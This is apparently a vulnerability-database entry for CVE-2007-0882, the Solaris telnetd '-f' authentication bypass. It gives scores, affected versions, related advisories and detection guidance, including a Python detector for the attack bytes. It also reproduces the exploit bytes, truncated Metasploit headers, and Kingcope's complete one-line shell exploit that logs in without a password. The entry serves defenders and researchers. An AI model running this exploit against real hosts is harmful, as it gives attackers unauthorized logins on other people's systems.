CVE-2007-0882
Published 2007-02-12
Priority: P2 (score 75) · Severity: critical · CVSS 2.0 base score: 10.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 97.85% (99.9th percentile)
Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.
Affected (15 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | krb5 | < 1.4.4-8 (bookworm) | 1.4.4-8 (bookworm) |
| mit | kerberos_5 | < 1.6.1 | 1.6.1 |
| mit | krb5 | >= 0, < 1.4.4-8 | 1.4.4-8 |
| oracle | solaris | — | — |
| sun | sunos | — | — |
Detection & IOCs (extracted from sources)
Client option negotiation seen in the exploit (IAC DO/WILL sequences; the last WILL, 0xFF 0xFB 0x27, offers NEW-ENVIRON):
FF FD 26 FF FB 26 FF FD 03 FF FB 18 FF FB 1F FF FB 20 FF FB 21 FF FB 22 FF FB 27 FF FD 05
Subnegotiations that follow: TERMINAL-TYPE IS "XTERM" (option 0x18), then NEW-ENVIRON IS VAR "USER" VALUE "-f<USER>" (option 0x27):
FF FA 18 00 58 54 45 52 4D FF F0 FF FA 27 00 00 55 53 45 52 01 2D 66 <USER> FF F0
- Detect telnet login attempts where the username or the USER environment variable begins with '-f' (e.g., '-fbin'), indicating an attempt to pass the -f flag through to the login program so that it skips authentication.
- Monitor telnet (port 23) traffic for the Telnet NEW-ENVIRON subnegotiation (0xFF 0xFA 0x27) carrying a USER variable whose value starts with the bytes 0x2D 0x66 ('-f'); this is the exploit's injection vector.
- Alert on telnet sessions to Solaris hosts (SunOS 5.10/5.11) on port 23 where the terminal type is set to XTERM (TERMINAL-TYPE subnegotiation 0xFF 0xFA 0x18 0x00 'XTERM') together with a USER NEW-ENVIRON value prefixed with '-f', as this is the specific exploit sequence.
- Flag successful unauthenticated logins to privileged or system accounts (e.g., 'bin') via telnet on Solaris 10/11 systems, as these are the default targets of this exploit.
- Caveat: the exploit targets in.telnetd on Solaris 10 and 11 (SunOS 5.10 and 5.11) only; other platforms running telnetd are not affected by this specific CVE (CVE-2007-0956 is a similar issue in MIT krb5 telnetd).
- Caveat: the Metasploit module requires the telnet service to be running and reachable on port 23; disabling in.telnetd or blocking port 23 at the network perimeter fully mitigates this vulnerability.
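The detection items above describe the bytes to look for but not how to pull them out of a telnet stream. The following parser is an added example (not part of the CVE record or of any listed source): it walks the client-to-server side of a telnet session, extracts IAC SB ... IAC SE subnegotiations (un-escaping doubled 0xFF bytes), decodes NEW-ENVIRON IS/INFO payloads per RFC 1572, and reports any USER value that begins with '-', together with the negotiated terminal type. The sample streams are constructed: the first follows the byte pattern quoted in this section with the `<USER>` placeholder set to "bin", the second is an ordinary login. The function and class names are this example's own.

```python
"""Flag telnet NEW-ENVIRON USER values that begin with '-' (the CVE-2007-0882 vector).

Added example, not taken from the CVE record. Input is the client-to-server byte
stream of one telnet session (e.g. reassembled from a port-23 capture).
"""
from dataclasses import dataclass
from typing import Optional

IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
OPT_TERMINAL_TYPE, OPT_NEW_ENVIRON = 0x18, 0x27
# NEW-ENVIRON subcommand and type codes (RFC 1572)
ENV_IS, ENV_INFO = 0, 2
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3


@dataclass
class Finding:
    kind: str
    user: bytes
    terminal: Optional[bytes]


def extract_subnegotiations(stream: bytes):
    """Yield (option, payload) for each IAC SB <opt> ... IAC SE block.

    Doubled IAC bytes inside a payload are un-escaped. WILL/WONT/DO/DONT and
    other two-byte commands are skipped so their option bytes are not read as data.
    """
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd != SB:
            i += 3 if cmd in (WILL, WONT, DO, DONT) else 2
            continue
        if i + 2 >= n:
            break
        opt, j, payload = stream[i + 2], i + 3, bytearray()
        while j < n:
            b = stream[j]
            if b == IAC:
                if j + 1 < n and stream[j + 1] == IAC:   # escaped 0xFF data byte
                    payload.append(IAC)
                    j += 2
                    continue
                if j + 1 < n and stream[j + 1] == SE:    # end of subnegotiation
                    j += 2
                break                                    # truncated or malformed: stop here
            payload.append(b)
            j += 1
        yield opt, bytes(payload)
        i = j


def parse_new_environ(payload: bytes):
    """Decode an IS/INFO NEW-ENVIRON payload into (name, value) pairs.

    VAR/USERVAR opens an entry, VALUE switches to its value, ESC makes the next
    byte literal. A name sent without VALUE yields value None. SEND payloads
    carry no client data and return [].
    """
    if not payload or payload[0] not in (ENV_IS, ENV_INFO):
        return []
    pairs, name, value, in_value, open_entry = [], bytearray(), bytearray(), False, False
    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (ENV_VAR, ENV_USERVAR):
            if open_entry:
                pairs.append((bytes(name), bytes(value) if in_value else None))
            name, value, in_value, open_entry = bytearray(), bytearray(), False, True
        elif b == ENV_VALUE:
            in_value = True
        else:
            if b == ENV_ESC and i + 1 < len(payload):
                i += 1
                b = payload[i]
            (value if in_value else name).append(b)
        i += 1
    if open_entry:
        pairs.append((bytes(name), bytes(value) if in_value else None))
    return pairs


def inspect_client_stream(stream: bytes):
    """Return a Finding for every NEW-ENVIRON USER value that begins with '-'."""
    findings, terminal = [], None
    for opt, payload in extract_subnegotiations(stream):
        if opt == OPT_TERMINAL_TYPE and payload[:1] == b"\x00":   # TERMINAL-TYPE IS <name>
            terminal = payload[1:]
        elif opt == OPT_NEW_ENVIRON:
            for name, value in parse_new_environ(payload):
                if name.upper() == b"USER" and value is not None and value.startswith(b"-"):
                    findings.append(Finding("telnet_user_option_injection", value, terminal))
    return findings


# Constructed samples: the first follows the byte pattern quoted in the Detection
# section with the <USER> placeholder set to "bin"; the second is a normal login.
SAMPLE_EXPLOIT = bytes.fromhex(
    "FF FD 26 FF FB 26 FF FD 03 FF FB 18 FF FB 1F FF FB 20 FF FB 21 FF FB 22 FF FB 27 FF FD 05"
    "FF FA 18 00 58 54 45 52 4D FF F0"                    # TERMINAL-TYPE IS "XTERM"
    "FF FA 27 00 00 55 53 45 52 01 2D 66 62 69 6E FF F0"  # NEW-ENVIRON IS VAR "USER" VALUE "-fbin"
)
SAMPLE_BENIGN = bytes.fromhex(
    "FF FA 18 00 58 54 45 52 4D FF F0"
    "FF FA 27 00 00 55 53 45 52 01 61 6C 69 63 65 FF F0"  # VAR "USER" VALUE "alice"
)

if __name__ == "__main__":
    for label, sample in (("exploit", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        print(label, inspect_client_stream(sample))
```

Matching on the decoded USER value rather than on the raw bytes 0x2D 0x66 means the rule still fires when the client escapes or splits the value, and checking for a leading '-' rather than '-f' also covers the MIT krb5 variant (CVE-2007-0956) described below, which triggers on any username beginning with '-'.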
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 10.0 | CRITICAL | — |
| vendor_debian | — | 10.0 | HIGH | — |
| vendor_redhat | — | 10.0 | CRITICAL | — |
Related advisories
Red Hat (vendor_redhat · 2007-04-03 · CVSS 10.0)
CVE-2007-0956 [CRITICAL]: Unauthorized access via krb5-telnet daemon
The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
Debian (vendor_debian · 2007 · CVSS 10.0)
CVE-2007-0956 [CRITICAL]: krb5 - The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
Scope: local
bookworm: resolved (fixed in 1.4.4-8)
bullseye: resolved (fixed in 1.4.4-8)
forky: resolved (fixed in 1.4.4-8)
sid: resolved (fixed in 1.4.4-8)
trixie: resolved (fixed in 1.4.4-8)
GHSA (ghsa_unreviewed · 2022-05-03 · CVSS 10.0)
CVE-2007-0956 [CRITICAL] CWE-306 GHSA-gcgf-6qp7-hmmv: The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
GHSA (ghsa_unreviewed · 2022-05-01)
CVE-2007-0882 [HIGH] CWE-88 GHSA-jpgv-x3r5-pm29: Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.
OSV (osv · 2007-04-06 · CVSS 10.0)
CVE-2007-0956 [CRITICAL]: The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
No detection rules found.
Exploit-DB (exploitdb · 2010-06-22)
CVE-2007-0882: Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)
---
```ruby
##
# $Id: fuser.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Telnet

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
      'Description' => %q{
        This module exploits the argument injection vulnerability
        in the telnet daemon (in.telnetd) of Solaris 10 and 11.
      },
      'Author'      => [ 'MC' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 9583 $',
      'References'  =>
        [
          [ 'CVE', '2007-0882' ],
          [ 'OSVDB', '31881'],
          [ 'BID', '22512' ],
        ],
      'Privile
# (the indexed preview of the module ends here)
```
Exploit-DB (exploitdb · 2007-02-12)
CVE-2007-0882: Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)
---
```ruby
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Telnet

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
      'Description' => %q{
        This module exploits the argument injection vulnerability
        in the telnet daemon (in.telnetd) of Solaris 10 and 11.
      },
      'Author'      => [ 'MC' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision$',
      'References'  =>
        [
          [ 'CVE', '2007-0882' ],
          [ 'OSVDB', '31881'],
          [ 'BID', '22512' ],
        ],
      'Privileged'  => false,
      'Platform'    => ['unix', 'solaris'
# (the indexed preview of the module ends here)
```
Exploit-DB (exploitdb · 2007-02-11)
CVE-2007-0882: SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass
---
```sh
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]"
if [ $# -ne 2 ]; then
  echo "./sunos <host> <user>"
  echo "./sunos localhost bin"
  exit
fi
echo ""
echo "ALEX ALEX"
echo ""
# The whole technique is one line: the client's -l option sets the USER
# environment variable, which in.telnetd passes on to login(1) unchecked,
# so a value of "-f<user>" is read by login as its own -f (skip auth) flag.
telnet -l"-f$2" $1
# milw0rm.com [2007-02-11]
```
Metasploit (metasploit)
Sun Solaris Telnet Remote Authentication Bypass Vulnerability
This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.
No writeups or analysis indexed.
References
- http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html
- http://isc.sans.org/diary.html?storyid=2220
- http://osvdb.org/31881
- http://seclists.org/fulldisclosure/2007/Feb/0217.html
- http://secunia.com/advisories/24120
- http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1
- http://www.kb.cert.org/vuls/id/881872
- http://www.securityfocus.com/archive/1/459831/100/0/threaded
- http://www.securityfocus.com/archive/1/459843/100/0/threaded
- http://www.securityfocus.com/archive/1/459855/100/0/threaded
- http://www.securityfocus.com/archive/1/459980/100/0/threaded
- http://www.securityfocus.com/archive/1/460086/100/100/threaded
- http://www.securityfocus.com/archive/1/460103/100/100/threaded
- http://www.securityfocus.com/bid/22512
- http://www.securitytracker.com/id?1017625
- http://www.us-cert.gov/cas/techalerts/TA07-059A.html
- http://www.vupen.com/english/advisories/2007/0560
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32434
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2202